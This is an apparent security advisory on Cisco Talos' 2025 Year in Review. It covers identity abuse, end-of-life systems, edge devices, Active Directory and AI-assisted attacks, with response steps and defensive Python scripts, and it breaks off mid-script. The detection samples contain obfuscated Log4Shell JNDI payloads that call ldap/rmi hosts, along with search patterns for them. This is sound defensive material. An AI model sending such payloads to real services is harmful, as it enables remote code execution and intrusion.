Severity: HIGH | CVSS: 7.5 | Priority: 0.856
Executive Summary
Cisco Talos' 2025 Year in Review identifies five structural weaknesses that attackers exploited systematically across the full year: identity and authentication abuse, unpatched and end-of-life systems, network edge device compromise, Active Directory exploitation, and AI-assisted attack scaling. Device compromise rose 178% year over year, and nearly 40% of the most targeted vulnerabilities affected products that vendors no longer support. The report signals that attacker advantages are increasingly structural, not situational, meaning organizations that have deferred identity hygiene, patch cycles, and edge device hardening are now carrying compounding risk across all five vectors simultaneously.
Impact Assessment
CISA KEV Status: Not listed
Threat Severity: HIGH (high severity, prioritize for investigation)
Actor Attribution: HIGH (multiple ransomware operators, unspecified; China-nexus state-sponsored actors)
TTP Sophistication: HIGH (17 MITRE ATT&CK techniques identified)
Detection Difficulty: HIGH (multiple evasion techniques observed)
Target Scope (INFO): IAM platforms, PAM systems, VPNs, Active Directory Domain Controllers, application delivery controllers (ADCs), firewalls, PHP frameworks, Apache Log4j (Log4Shell), Adobe ColdFusion, network management platforms, with elevated exposure on end-of-life systems
Are You Exposed?
⚠ Your industry is targeted by multiple ransomware operators (unspecified) or China-nexus state-sponsored actors → Heightened risk
⚠ You operate IAM platforms → Assess exposure
⚠ 17 attack techniques identified → Review your detection coverage for these TTPs
✓ Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓ You have incident response procedures for this threat type → Prepared
(Assessment estimated from severity rating and threat indicators)
Business Context
The Talos findings establish that the five exploited weaknesses are not isolated technical failures — they are compounding governance gaps that increase breach probability and cost with each deferral cycle. Organizations carrying EOL infrastructure, weak identity controls, or unmonitored network edge devices are exposed across multiple attacker playbooks simultaneously, including ransomware operators and all four major state-sponsored threat clusters. The 178% year-over-year increase in device compromise translates directly to higher incident response costs, extended recovery timelines, and increased regulatory scrutiny for organizations in sectors with mandatory breach notification obligations.
You Are Affected If
Your organization operates IAM or PAM platforms without MFA push-bombing protections or session token lifetime controls
Your environment includes end-of-life systems — particularly those running Log4j-dependent applications, Adobe ColdFusion, or legacy PHP frameworks — with internet or network exposure
Your network perimeter includes VPNs, application delivery controllers, or firewalls that lack EDR coverage and are not baselined for behavioral anomaly detection
Your Active Directory environment has not undergone attack path analysis in the past 12 months, or carries legacy trusts and over-provisioned accounts from prior consolidations
Your organization operates in a sector previously targeted by China-nexus, Russia-nexus, North Korea-nexus, or Iran-nexus actors, or has been targeted by ransomware operators in the past three years
Board Talking Points
Attackers in 2025 systematically exploited five structural weaknesses — identity controls, unpatched systems, network edge devices, Active Directory, and AI-assisted automation — and device compromise increased 178% year over year, meaning organizations that have deferred hardening in any of these areas carry documented, compounding risk today.
The organization should prioritize a 30-day audit of end-of-life systems, MFA control quality, and Active Directory posture, with findings and remediation timelines presented to the security committee before the next board cycle.
Organizations that do not address these structural gaps face higher breach probability, longer recovery timelines, and increased exposure to regulatory penalties — the Talos data shows these are not theoretical risks but active attacker priorities observed at scale across 2025.
Technical Analysis
Talos' annual synthesis draws from incident response engagements, telemetry, and threat intelligence collected across 2025, and the picture it assembles is one of converging structural failures rather than isolated exploitation events.
The first and most pervasive weakness is identity and authentication abuse.
Attackers targeting IAM and PAM platforms used credential stuffing, MFA bypass techniques (T1621, MFA fatigue and push-bombing), and session cookie and token theft (T1539) to get past authentication without exploiting a software vulnerability at all.
Valid account abuse (T1078) and authentication mechanism modification (T1556, T1556.006) appeared consistently across ransomware and state-sponsored intrusions alike, reinforcing that authentication controls, not just perimeter defenses, are the primary battleground.
The second weakness is the unpatched and end-of-life system problem, which Talos frames as an industry-wide governance failure rather than a technical oversight. Nearly 40% of the top 100 most targeted vulnerabilities affected EOL products. Log4Shell (CVE-2021-44228) and Adobe ColdFusion vulnerabilities, some of the latter more than a decade old, remained active exploitation targets throughout 2025. Exploitation of public-facing applications (T1190) mapped consistently to CWE-1104 (use of unmaintained third-party components) and CWE-1395 (dependency on a vulnerable third-party component), indicating that the exposure is not merely about missing patches but about inherited technical debt that defenders cannot patch their way out of.
The third weakness is trust-broker compromise. VPNs, application delivery controllers, and firewalls, devices that sit at the intersection of trusted and untrusted networks, were systematically targeted for persistent access. External remote services (T1133) provided initial footholds; exploitation for privilege escalation (T1068) extended attacker reach once inside. Because these devices often lack EDR coverage and generate logs that security teams rarely inspect, dwell times in this vector tend to be long.
The fourth weakness is Active Directory abuse. Once inside, attackers consistently turned to AD as the path of least resistance for lateral movement and privilege escalation. Domain policy modification (T1484), credential dumping (T1003), and lateral movement over legitimate remote services such as RDP, SMB and WinRM (T1021) formed a recurring post-exploitation chain. The persistence of this pattern reflects a broader problem: AD environments accumulate misconfigurations, legacy trusts, and over-provisioned accounts over years, and few organizations have continuous AD posture monitoring in place.
The fifth weakness is AI-assisted attack scaling. Talos documents attacker use of AI to accelerate reconnaissance (T1595, T1589), generate targeted phishing content (T1566), and automate exploitation chain assembly. The practical effect is compression of the time between initial access and lateral movement, reducing the window defenders have to detect and respond. This is not a speculative future threat; Talos observed it operationally across 2025 engagements.
Across all five vectors, Talos notes that behavioral anomalies remain detectable by well-tuned defenses. The core defensive gap is not sensor coverage but the absence of tuned behavioral baselines; without them, attacker activity blends into noise instead of generating actionable alerts.
Action Checklist (IR enriched)
Triage Priority: URGENT
Escalate immediately to the CISO and legal counsel if any Talos-published IOC matches observed network traffic or log entries, if an EOL network edge device (VPN, ADC, firewall) shows evidence of unauthorized access, or if Domain Controller security logs show DCSync activity (T1003.006: Event ID 4662 with the replication extended rights requested by an account that is not a Domain Controller). Any of these conditions indicates a likely active compromise requiring a breach notification assessment under the applicable regulatory frameworks (HIPAA, PCI DSS, state breach notification laws).
Step 1: Assess exposure. Audit your environment for end-of-life systems across all five affected categories: IAM/PAM platforms, VPNs, ADCs, firewalls, and application frameworks, including PHP, Log4j-dependent services, and ColdFusion instances. Prioritize internet-facing and network-edge assets.
IR Detail: Preparation
NIST 800-61r3 §2 — Preparation: establishing IR capability and reducing attack surface before incidents occur
NIST SI-2 (Flaw Remediation) — identify and correct EOL systems that cannot receive patches
NIST RA-3 (Risk Assessment) — assess risk of running unsupported IAM/PAM, VPN, ADC, and firewall platforms
CIS 1.1 (Establish and Maintain Detailed Enterprise Asset Inventory) — enumerate all assets including network-edge devices and application frameworks
CIS 2.2 (Ensure Authorized Software is Currently Supported) — flag Log4j-dependent services, Adobe ColdFusion, and PHP frameworks running unsupported versions
CIS 7.1 (Establish and Maintain a Vulnerability Management Process) — scope vulnerability scanning to include EOL network edge devices that scanners often skip
Compensating Control
Run `nmap -sV --script=banner -p 443,8443,80,8080,22,23 <CIDR>` against your perimeter to fingerprint VPN gateways, ADCs, and firewalls and identify product versions. Cross-reference the output against CISA's Known Exploited Vulnerabilities (KEV) catalog using a local copy of the JSON feed and `grep`. For Log4j exposure, use the free Huntress Log4Shell Vulnerability Tester, or on Linux hosts run `find / \( -name 'log4j*.jar' -o -name 'log4j*.war' \) 2>/dev/null`; on Windows use `Get-ChildItem -Recurse -Filter 'log4j*.jar'`. Name-based searches miss log4j-core copies bundled inside application .war/.ear archives or shaded jars, so treat a clean result as incomplete rather than negative. For ColdFusion, look for `CFID`/`CFTOKEN` session cookies in HTTP responses or a reachable `/CFIDE/` path, or check `C:\ColdFusion<version>\cfusion\logs\` for version strings.
Preserve Evidence
Before modifying any system, capture: (1) current firewall and VPN firmware version strings from the admin console or SNMP OID 1.3.6.1.2.1.1.1.0 (sysDescr); (2) ColdFusion administrator logs at `{cf_root}/cfusion/logs/application.log` and `server.log` for evidence of pre-existing exploitation; (3) Log4j JNDI lookup attempts in Java application logs, searching for `${jndi:` string patterns in any `.log` file (and for the nested-lookup obfuscations such as `${${lower:j}ndi:` that a plain `${jndi:` search misses); (4) PAM platform audit logs showing recent privileged session creation, particularly any sessions initiated from external IP ranges; (5) network flow data (NetFlow/IPFIX) showing unusual outbound connections from application servers on TCP 1389, 389, or 636 (LDAP/LDAPS) or 1099 (RMI), which may indicate a successful Log4Shell JNDI callback.
Step 2: Review controls. Verify MFA implementation quality (not just MFA presence): confirm push-bombing protections are active, session token lifetimes are enforced, and PAM solutions log and alert on privileged session anomalies. Confirm EDR coverage extends to network edge devices, or that compensating log monitoring is in place.
IR Detail: Preparation
NIST 800-61r3 §2 — Preparation: ensuring detective and preventive controls are functional before adversary activity occurs; aligns with CSF PR and DE functions
NIST IR-4 (Incident Handling) — validate that PAM alerting on privileged session anomalies feeds the incident handling capability
NIST SI-4 (System Monitoring) — confirm monitoring coverage extends to VPN concentrators, ADCs, and firewalls where EDR agents cannot be deployed
NIST IA-5 (Authenticator Management) — enforce session token lifetimes and MFA push-bombing protections on IAM/PAM platforms targeted in the Talos findings
CIS 6.3 (Require MFA for Externally-Exposed Applications) — validate push-fatigue protections (number matching, geographic context) are enabled, not just MFA enrollment
CIS 6.5 (Require MFA for Administrative Access) — confirm PAM-gated administrative sessions require MFA at privilege elevation, not only at initial login
CIS 8.2 (Collect Audit Logs) — verify syslog forwarding is active from VPN gateways, firewalls, and ADCs to a central log store
Compensating Control
For MFA push-bombing detection without enterprise IAM tooling: enable number matching in Microsoft Authenticator (on by default for push notifications in Entra ID and not tied to a premium license), or use TOTP-based MFA (Google Authenticator, FreeOTP), which cannot be push-bombed because no push is ever sent. For PAM session monitoring on a budget, deploy Sysmon (config minimum: Event ID 1 process create, Event ID 3 network connect, Event ID 10 process access) on PAM jump hosts and forward via WEF (Windows Event Forwarding) to a central Windows Event Collector. For network edge devices without EDR, configure syslog-ng or rsyslog to receive device logs and run a simple cron job alerting on authentication failure bursts, for example `grep -E 'Failed|authentication failure' /var/log/syslog | grep -oE 'from [0-9.]+' | sort | uniq -c | awk '$1 > 10'`, which counts failures per source IP instead of relying on a fixed syslog field position (the field index varies across device log formats).
Preserve Evidence
Before tuning controls, baseline and preserve: (1) Entra ID (Azure AD) sign-in logs (MFA result field, conditional access outcome, IP address), exported via `Get-MgAuditLogSignIn` for the prior 30 days to establish normal MFA approval rates and detect historical push-bombing attempts; (2) the PAM platform session recordings index, noting any sessions with anomalous duration, unusual target systems, or off-hours timing consistent with T1078 (Valid Accounts) abuse; (3) VPN authentication logs showing successful logins from IP ranges not matching established user baselines; on Cisco ASA review `%ASA-6-113004` (AAA authentication successful) and `%ASA-6-113039` (AnyConnect session started) for successes and `%ASA-6-113015` (AAA authentication rejected) for failures; (4) Active Directory Security Event Log (Event ID 4768, Kerberos TGT request; Event ID 4769, service ticket request) on Domain Controllers to identify credential abuse predating the control review.
Step 3: Update the threat model. Incorporate all five Talos-identified vectors as active threat scenarios in your threat register. Map them against your current control inventory using MITRE ATT&CK techniques T1078, T1621, T1539, T1190, T1484, T1003, T1133, and T1595, and flag gaps where no detective control exists.
IR Detail: Preparation
NIST 800-61r3 §2 — Preparation: using threat intelligence to shape IR plans and detection priorities; aligns with CSF ID.RA (Risk Assessment) and DE.AE-07 (CTI integration into adverse event analysis)
NIST RA-3 (Risk Assessment) — update risk register entries for identity abuse (T1078, T1621), network edge exploitation (T1190, T1133), and AD attacks (T1484, T1003) based on Talos prevalence data
NIST IR-8 (Incident Response Plan) — revise IR plan scenarios to include the five Talos structural weaknesses as named threat scenarios with specific playbook triggers
NIST SI-5 (Security Alerts, Advisories, and Directives) — formally process the Talos 2025 Year in Review as a threat intelligence input requiring control gap analysis
CIS 7.1 (Establish and Maintain a Vulnerability Management Process) — incorporate T1190 (Exploit Public-Facing Application) targeting EOL ADCs, firewalls, and ColdFusion into vuln prioritization criteria
CIS 7.2 (Establish and Maintain a Remediation Process) — assign remediation priority to control gaps identified in the ATT&CK mapping, particularly where no detective control exists for T1484 (Domain Policy Modification) or T1003 (OS Credential Dumping)
Compensating Control
Use the free MITRE ATT&CK Navigator (browser-based, no installation) to create a layer mapping your existing detective controls against T1078, T1621, T1539, T1190, T1484, T1003, T1133, and T1595 — color-code red for no coverage, yellow for partial, green for covered. Export the layer as JSON for your threat register. For Sigma rule coverage gaps, search the public Sigma rule repository (`github.com/SigmaHQ/sigma`) for rules targeting each technique — e.g., `rules/windows/builtin/security/win_security_dcsync.yml` covers T1003.006 (DCSync), and `rules/network/cisco/` covers edge device anomalies.
Preserve Evidence
Before updating the threat model, pull current-state evidence to establish a baseline: (1) Windows Security Event Log on Domain Controllers: Event ID 4662 (directory service object access) entries whose Properties field contains the replication extended rights DS-Replication-Get-Changes ({1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}) or DS-Replication-Get-Changes-All ({1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}) and whose subject is not a Domain Controller computer account, to determine whether T1003.006 (DCSync) has been attempted; (2) Group Policy change audit logs: Event ID 5136 (directory service object modified) filtered on `groupPolicyContainer` objects to detect T1484 (Domain Policy Modification) in the prior 90 days; (3) Windows Security Event Log Event ID 4964 (special groups logon) and Event ID 4672 (special privileges assigned) to surface T1078 (Valid Accounts) privilege escalation; (4) VPN and firewall logs for T1133 (External Remote Services): extract all successful authentications, compare their source IPs against IP reputation feeds, and flag any from Tor exit nodes, bulletproof hosting ASNs, or anonymizers.
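A worked triage of the Event ID 4662 and 5136 evidence described above (and again under Key Forensic Artifacts), as an added example that is not code from Talos or from this page. It assumes the events have been exported from the Domain Controller Security log into dictionaries keyed by the standard event field names; the records are constructed samples, and the `MSOL_...` allowlist entry stands in for a hypothetical Entra Connect replication account. The point it makes is that the Properties GUIDs, not the event ID alone, identify DCSync, and that DC computer accounts and known replication services must be excluded before anything is called an alert.

```python
"""Triage DCSync (T1003.006) and GPO modification (T1484) candidates from exported DC events.

Added example, not from the Talos report or this page. Input records mimic the
field names of Windows Security Event IDs 4662 and 5136 after XML export; the
records themselves are constructed samples. A DC replicates legitimately, so
computer accounts (name ends in "$") are excluded, and known replication service
accounts (the "MSOL_..." name below is a hypothetical Entra Connect account) can
be allowlisted explicitly.
"""

# Extended-right GUIDs a DCSync caller needs on the domain object (well-known AD values)
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GPO_CLASS = "groupPolicyContainer"
DOMAIN_DN = "DC=corp,DC=example"

def _props(*guids):
    """Render a Properties field the way the 4662 XML export shows it."""
    return "%%7688 " + " ".join("{" + g + "}" for g in guids)

DC_EVENTS = [  # constructed sample records
    {"EventID": 4662, "TimeCreated": "2025-03-10T08:00:00Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "DC02$", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},   # DC-to-DC replication
    {"EventID": 4662, "TimeCreated": "2025-03-10T08:30:00Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "MSOL_a1b2c3d4", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},   # hypothetical sync account
    {"EventID": 4662, "TimeCreated": "2025-03-10T09:12:41Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "jdoe", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},   # DCSync
    {"EventID": 4662, "TimeCreated": "2025-03-10T09:15:02Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "svc-backup", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES)},                             # partial rights only
    {"EventID": 4662, "TimeCreated": "2025-03-10T09:20:00Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "jdoe", "ObjectName": "CN=bob,CN=Users," + DOMAIN_DN, "AccessMask": "0x100",
     "Properties": _props("00299570-246d-11d0-a768-00aa006e0529")},         # unrelated extended right
    {"EventID": 5136, "TimeCreated": "2025-03-10T09:40:00Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "jdoe", "ObjectClass": GPO_CLASS, "AttributeLDAPDisplayName": "versionNumber",
     "ObjectDN": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System," + DOMAIN_DN},
    {"EventID": 5136, "TimeCreated": "2025-03-10T09:41:00Z", "SubjectDomainName": "CORP",
     "SubjectUserName": "hr-admin", "ObjectClass": "user", "AttributeLDAPDisplayName": "title",
     "ObjectDN": "CN=bob,CN=Users," + DOMAIN_DN},
]

def find_dcsync(events, allowlist=()):
    """4662 events carrying a replication extended right from a non-DC, non-allowlisted account."""
    allow = {a.upper() for a in allowlist}
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = [g for g in (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL) if g in props]
        if not rights:
            continue
        who = e["SubjectUserName"]
        if who.endswith("$") or who.upper() in allow:   # DCs and sanctioned sync accounts replicate legitimately
            continue
        hits.append({"time": e["TimeCreated"], "account": f'{e["SubjectDomainName"]}\\{who}',
                     "object": e.get("ObjectName", ""),
                     # Get-Changes-All is the right that lets the caller read password hashes
                     "secrets_readable": DS_REPL_GET_CHANGES_ALL in rights})
    return hits

def find_gpo_changes(events):
    """5136 events that modified a Group Policy container (T1484 candidates)."""
    return [{"time": e["TimeCreated"], "account": f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}',
             "gpo": e.get("ObjectDN", ""), "attribute": e.get("AttributeLDAPDisplayName", "")}
            for e in events if e.get("EventID") == 5136 and e.get("ObjectClass") == GPO_CLASS]

if __name__ == "__main__":
    for h in find_dcsync(DC_EVENTS, allowlist=("MSOL_a1b2c3d4",)):
        print("DCSYNC", h)
    for g in find_gpo_changes(DC_EVENTS):
        print("GPO", g)
```

Run without an allowlist first; the extra hit it produces is exactly the sanctioned replication account you need to document before suppressing it, and an account that appears with Get-Changes but not Get-Changes-All is still worth a look because it is one ACL edit away from a working DCSync.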
Step 4: Communicate findings. Brief leadership on the 178% device compromise increase and the EOL system finding. Frame the EOL issue as governance risk, not technical debt: if nearly 40% of the most targeted vulnerabilities affect unsupported products, any EOL system your organization runs is a documented attacker priority.
IR Detail: Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity: lessons learned, communicating systemic risk to leadership to drive policy and resource decisions; aligns with CSF GV.OC (Organizational Context)
NIST IR-6 (Incident Reporting) — extend reporting obligations to proactive risk communication: leadership must be informed of material threat intelligence findings like the Talos 178% device compromise increase before an incident occurs
NIST IR-8 (Incident Response Plan) — EOL system risk must be documented in the IR plan as a known environmental constraint affecting containment and eradication options
NIST SI-2 (Flaw Remediation) — the 40% EOL vulnerability targeting statistic is a direct input to the flaw remediation program; unsupported systems are unfixable by definition and require compensating control or decommission decisions
CIS 7.2 (Establish and Maintain a Remediation Process) — EOL systems with no patch path must be escalated to leadership as requiring either compensating controls or formal decommission timelines per the remediation process
Compensating Control
For teams without a formal risk register tool: create a one-page EOL Risk Register in a spreadsheet listing each EOL asset, its internet-facing status, the CVEs actively targeting its product family (pulled from CISA KEV), and the business owner. Attach the Talos statistic (40% of targeted vulns affect EOL products) as a cited source. Present as a risk acceptance decision requiring leadership signature — this documents due diligence and creates accountability for the decommission/compensate decision. Use CISA's free Cyber Hygiene (CyHy) scanning service for external attack surface validation to support the briefing with objective data.
Preserve Evidence
Supporting data for the leadership brief that must be preserved as documented evidence: (1) CISA KEV catalog entries — download the current KEV JSON feed (`https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`) and filter for CVEs affecting your specific EOL products to produce a count of actively exploited vulnerabilities you cannot patch; (2) Asset inventory export showing EOL systems with their last-seen network activity timestamps — confirming they are active, not dormant; (3) Vulnerability scanner output (even from free tools like OpenVAS or Greenbone Community Edition) showing CVSS scores against EOL assets — this quantifies the risk in terms leadership can act on; (4) Network flow records showing inbound connection attempts to EOL network edge devices from external IP ranges — demonstrating active adversary interest, not hypothetical risk.
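The KEV cross-reference that Step 1's compensating control and item (1) above both call for, as an added example that is not code from Talos or from this page. It assumes the asset inventory from Step 1 is available as vendor/product/EOL/internet-facing rows; the inventory is invented, and the three catalog records are a constructed excerpt that keeps only the fields the script reads (the CVE IDs are real KEV entries, but check the live feed for the authoritative fields). It goes a little beyond the prose by carrying the catalog's `knownRansomwareCampaignUse` flag into the register rows, since that is the column leadership asks about first.

```python
"""Cross-reference an end-of-life asset list against the CISA KEV feed.

Added example, not from the Talos report or this page. The feed layout
(vulnerabilities[].cveID / vendorProject / product / knownRansomwareCampaignUse)
follows the real KEV JSON schema; the three records below are a constructed
excerpt with only the fields this script reads, and the asset inventory is
invented. For real use, load the full feed from
https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
"""
import json
import re
from collections import defaultdict

KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2010-2861", "vendorProject": "Adobe", "product": "ColdFusion",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-4966", "vendorProject": "Citrix",
     "product": "NetScaler ADC and NetScaler Gateway", "knownRansomwareCampaignUse": "Known"},
]})

ASSETS = [  # constructed inventory in the shape Step 1 produces
    {"host": "vpn-edge-01", "vendor": "Citrix", "product": "NetScaler ADC", "eol": True, "internet_facing": True},
    {"host": "cf-app-02", "vendor": "Adobe", "product": "ColdFusion", "eol": True, "internet_facing": True},
    {"host": "log-ingest-03", "vendor": "Apache", "product": "Log4j2", "eol": False, "internet_facing": False},
    {"host": "fw-core-01", "vendor": "Palo Alto Networks", "product": "PAN-OS", "eol": False, "internet_facing": True},
]

def _tokens(s):
    """Lower-cased alphanumeric tokens, so 'NetScaler ADC' matches 'NetScaler ADC and NetScaler Gateway'."""
    return set(re.findall(r"[a-z0-9]+", s.lower()))

def product_matches(asset, entry):
    """Vendor must share a token; every token of the asset product must appear in the KEV product string."""
    vendor_ok = bool(_tokens(asset["vendor"]) & _tokens(entry["vendorProject"]))
    return vendor_ok and _tokens(asset["product"]) <= _tokens(entry["product"])

def match_kev(assets, kev_json):
    """host -> list of {cve, ransomware} for every catalog entry that matches the host's product."""
    catalog = json.loads(kev_json)["vulnerabilities"]
    hits = defaultdict(list)
    for a in assets:
        for e in catalog:
            if product_matches(a, e):
                hits[a["host"]].append({"cve": e["cveID"],
                                        "ransomware": e.get("knownRansomwareCampaignUse") == "Known"})
    return dict(hits)

def eol_exposure(assets, kev_json):
    """Rows for the EOL risk register: EOL assets with KEV hits, internet-facing ones first."""
    hits = match_kev(assets, kev_json)
    rows = [{"host": a["host"], "internet_facing": a["internet_facing"],
             "cves": [h["cve"] for h in hits[a["host"]]],
             "ransomware_use": any(h["ransomware"] for h in hits[a["host"]])}
            for a in assets if a["eol"] and a["host"] in hits]
    rows.sort(key=lambda r: (not r["internet_facing"], r["host"]))
    return rows

if __name__ == "__main__":
    for row in eol_exposure(ASSETS, KEV_SAMPLE):
        print(row)
```

Token-subset matching is deliberately loose in the vendor direction and strict in the product direction: it catches catalog rows whose product string bundles several products (the Citrix row) without letting an inventory entry such as "PAN-OS" match every Palo Alto row. Supported assets with KEV hits are not in the register output, but `match_kev` still reports them so they land in the normal patch queue.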
Step 5: Monitor developments. Subscribe to Cisco Talos threat intelligence feeds for follow-on disclosures and sector-specific findings related to the threat vectors described in this report.
IR Detail: Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis: integrating external threat intelligence into ongoing monitoring; aligns with DE.AE-07 (CTI integrated into adverse event analysis) and DE.CM-01 (network monitoring for adverse events)
NIST SI-5 (Security Alerts, Advisories, and Directives) — formally subscribe to Cisco Talos intelligence feeds as an external organization providing security alerts and advisories
NIST IR-5 (Incident Monitoring) — incorporate Talos-published IOCs (IP ranges, domains, file hashes associated with identity abuse and edge device compromise campaigns) into active monitoring queries
NIST AU-6 (Audit Record Review, Analysis, and Reporting) — update log review procedures to query for Talos-disclosed IOCs across VPN, firewall, AD, and IAM log sources as new indicators are published
CIS 8.2 (Collect Audit Logs) — ensure log collection scope covers the sources where Talos-identified campaign activity would appear: DC Security logs, VPN auth logs, ADC access logs, and IAM platform audit trails
Compensating Control
Subscribe to Cisco Talos free intelligence feeds: the Talos IP Blacklist (`https://talosintelligence.com/documents/ip-blacklist`) updates daily and can be ingested into pfSense, iptables, or Windows Firewall via scheduled script. Use `curl` + `cron` to pull the feed daily and pipe into a local blocklist. For IOC matching without a SIEM, deploy osquery with the `osquery-defense-kit` pack and write a simple query against `process_open_sockets` to flag connections to Talos-listed IPs. For file-based IOCs (hashes), update ClamAV signatures with community databases including the `MalwarePatrol` feed (free tier available) and run scheduled scans on web-facing servers hosting PHP, ColdFusion, or Log4j-dependent applications. Create a free account on VirusTotal to bulk-check any new hashes Talos publishes.
Preserve Evidence
Evidence to collect and preserve as Talos publishes follow-on IOCs: (1) DNS query logs from your resolver (bind query log or Windows DNS debug logging — enable via `dnscmd /config /logLevel 0x8100`) to retroactively hunt Talos-disclosed C2 domains against historical queries, identifying beaconing that predates your subscription to the feed; (2) Proxy/firewall logs for HTTP/S connections matching Talos-published URI patterns associated with identity abuse campaigns — specifically look for POST requests to `/api/` endpoints on IAM/PAM platforms from unusual source IPs; (3) NetFlow or firewall session logs for connections to Talos-disclosed C2 IP ranges, preserved for at least 90 days to support retroactive hunt when new IOCs are released; (4) Windows Security Event Log Event ID 4624 (successful logon) Type 3 (network) and Type 10 (remote interactive) from Domain Controllers — retain for 180 days to support retroactive correlation when Talos publishes actor-attributed IP indicators from the 2025 campaigns.
Recovery Guidance
Following containment of any compromise linked to the Talos-identified vectors, prioritize rebuilding affected identity infrastructure (PAM, IAM, AD) from known-good baselines rather than attempting in-place remediation — session tokens, Kerberos tickets (including Golden/Silver Ticket artifacts), and OAuth tokens issued during the compromise window must be invalidated wholesale via a krbtgt double-reset for AD environments and full OAuth token revocation for IAM platforms. Monitor rebuilt systems for at least 30 days post-recovery using enhanced logging at the DEBUG level on PAM platforms, and watch specifically for T1078 (Valid Account) re-use, T1484 (Domain Policy Modification) attempts, and any reconnection to Talos-disclosed C2 infrastructure. EOL systems that cannot be patched must remain isolated from production network segments post-recovery until a formal decommission or compensating control decision is documented and approved.
Key Forensic Artifacts
Domain Controller security logs: audit Event ID 4662 (object access) entries carrying the DS-Replication-Get-Changes-All extended right ({1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}) from accounts other than Domain Controller computer accounts to detect DCSync (T1003.006) credential theft, which Talos identified as a top AD exploitation technique; `repadmin /showrepl` and `repadmin /replsummary` give replication partner and status context but do not by themselves reveal DCSync
PAM platform privileged session logs — export full session recordings and command audit trails for all sessions initiated in the 90 days prior to detection, focusing on sessions accessing Domain Controllers, firewall management interfaces, and VPN admin consoles — these are the lateral movement paths Talos documented in AD exploitation chains
Web server access logs on ColdFusion and PHP application servers: search for URI patterns consistent with ColdFusion administrator and AMF gateway probing (`/CFIDE/administrator/`, `/flex2gateway/`) and for Log4Shell JNDI payloads (`${jndi:ldap://`, `${jndi:rmi://`, including nested-lookup obfuscations such as `${${lower:j}ndi:` and URL-encoded forms), with source IPs and response codes preserved for timeline reconstruction
Network edge device (VPN/ADC/firewall) configuration change logs: extract all configuration changes for the prior 90 days (Cisco ASA: syslog `%ASA-5-111008` and `%ASA-5-111010`, which record each configuration command together with the executing user and source address; Palo Alto: the configuration audit log) to identify backdoor accounts, policy weakening, or rogue admin sessions consistent with the 178% device compromise increase Talos reported
Windows Security Event Log Event ID 4776 (NTLM credential validation) and Event ID 4771 (Kerberos pre-auth failure) on Domain Controllers — high volumes of these events from a single source IP or against multiple accounts indicate credential stuffing or password spray attacks against AD, the identity abuse vector Talos ranked as the top structural weakness of 2025
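An obfuscation-aware scanner for the access-log artifact above and for the `${jndi:` log search in Step 1, as an added example that is not code from Talos or from this page. Log4j 2 resolves nested lookups (`${lower:x}`, `${upper:x}`, `${key:-default}`) before it evaluates `${jndi:...}`, so a plain search for `${jndi:` misses `${${lower:j}ndi:...}` and `${${::-j}${::-n}di:...}`; the scanner replays that resolution and then matches. The log lines are constructed samples in Apache combined format using RFC 5737 documentation addresses.

```python
"""Obfuscation-aware Log4Shell probe detection over web access logs.

Added example, not from the Talos report or this page. Log4j 2 resolves nested
lookups (${lower:x}, ${upper:x}, ${key:-default}) before it evaluates ${jndi:...},
so a plain grep for "${jndi:" misses payloads such as ${${lower:j}ndi:...}.
The log is a constructed sample in Apache combined format; the IPs come from the
RFC 5737 documentation ranges.
"""
import re
from urllib.parse import unquote

ACCESS_LOG = r"""
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2025:12:00:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:ldap://198.51.100.99:1389/a}"
198.51.100.23 - - [10/Mar/2025:12:00:06 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.99:1099/b} HTTP/1.1" 404 0 "-" "curl/7.88"
192.0.2.55 - - [10/Mar/2025:12:01:00 +0000] "POST /flex2gateway/amf HTTP/1.1" 200 300 "-" "Java/1.8"
192.0.2.56 - - [10/Mar/2025:12:02:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""

COMBINED = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI_URI = re.compile(r"\x01jndi:((?:ldaps?|rmi|dns|iiop|corba|nds|https?)://[^\x02]*)\x02", re.I)
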